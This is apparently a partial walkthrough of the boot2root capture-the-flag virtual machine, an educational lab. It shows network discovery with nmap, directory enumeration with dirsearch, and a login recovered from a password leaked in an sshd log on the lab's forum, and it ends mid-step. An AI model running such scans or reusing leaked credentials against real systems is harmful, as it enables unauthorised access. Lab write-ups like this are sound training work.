0- Start VM:
    - VirtualBox -> Configuration -> Network -> Network access mode: bridge -> OK
    - Start VM

1- Find VM IP:
    - On Salty's VM:
        nmap -sn 192.168.0.0/16

        we get:
        Starting Nmap 7.60 ( https://nmap.org ) at 2020-11-20 12:44 CET
        Nmap scan report for 192.168.0.1
        Host is up (0.0047s latency).
        Nmap scan report for 192.168.0.19
        Host is up (0.0024s latency).
        Nmap done: 256 IP addresses (2 hosts up) scanned in 3.18 seconds

        So we have 2 IP addresses, we try entering them on a web browser
        We have a page for 192.168.0.19 with this written: 
            Hack me
            We're Coming Soon
        We have our IP!

2- Scan IP
    - We use dirsearch:
        git clone https://github.com/maurosoria/dirsearch ; cd dirsearch

    - python3 dirsearch.py -u https://192.168.0.19
          _|. _ _  _  _  _ _|_    v0.4.0
         (_||| _) (/_(_|| (_| )
        
        Extensions: php, asp, aspx, jsp, html, htm, js | HTTP method: GET | Threads: 20 | Wordlist size: 10023
        
        Error Log: /home/user42/Projets/boot2root/dirsearch/logs/errors-20-11-20_13-16-35.log
        
        Target: https://192.168.0.19/
        
        Output File: /home/user42/Projets/boot2root/dirsearch/reports/192.168.0.19/_20-11-20_13-16-35.txt
    
        [13:16:35] Starting: 
        [13:16:52] 403 -  289B  - /cgi-bin/
        [13:16:56] 301 -  314B  - /forum  ->  https://192.168.0.19/forum/
        [13:17:04] 301 -  319B  - /phpmyadmin  ->  https://192.168.0.19/phpmyadmin/
        [13:17:05] 200 -    7KB - /phpmyadmin/
        [13:17:06] 403 -  294B  - /server-status
        [13:17:06] 403 -  295B  - /server-status/
        [13:17:11] 403 -  307B  - /webmail/src/configtest.php
        [13:17:11] 302 -    0B  - /webmail/  ->  src/login.php
        
        Task Completed

        So we see that we have 3 accessible pages:
            https://192.168.0.19/forum
            https://192.168.0.19/phpmyadmin
            https://192.168.0.19/webmail

    - There is only one important page on the forum which is this one:
        https://192.168.0.19/forum/index.php?mode=thread&id=6
        
        On this page we find these lines that look like a user mistake:
            Oct 5 08:45:29 BornToSecHackMe sshd[7547]: Failed password for invalid user !q\]Ej?*5K5cy*AJ from 161.202.39.38 port 57764 ssh2
        Oct 5 08:45:29 BornToSecHackMe sshd[7547]: Received disconnect from 161.202.39.38: 3: com.jcraft.jsch.JSchException: Auth fail [preauth]
        Oct 5 08:46:01 BornToSecHackMe CRON[7549]: pam_unix(cron:session): session opened for user lmezard by (uid=1040)

        The important informations we retrieve here are a failed password for a user that does not exist on the user's list (!q\]Ej?*5K5cy*AJ) and then an opened session for the user lmezard 30 seconds later. It looks like Laurie entered her password instead of her login.
        We can now login as lmezard on the forum with the following combo:
            lmezard:!q\]Ej?*5K5cy*AJ

    - 

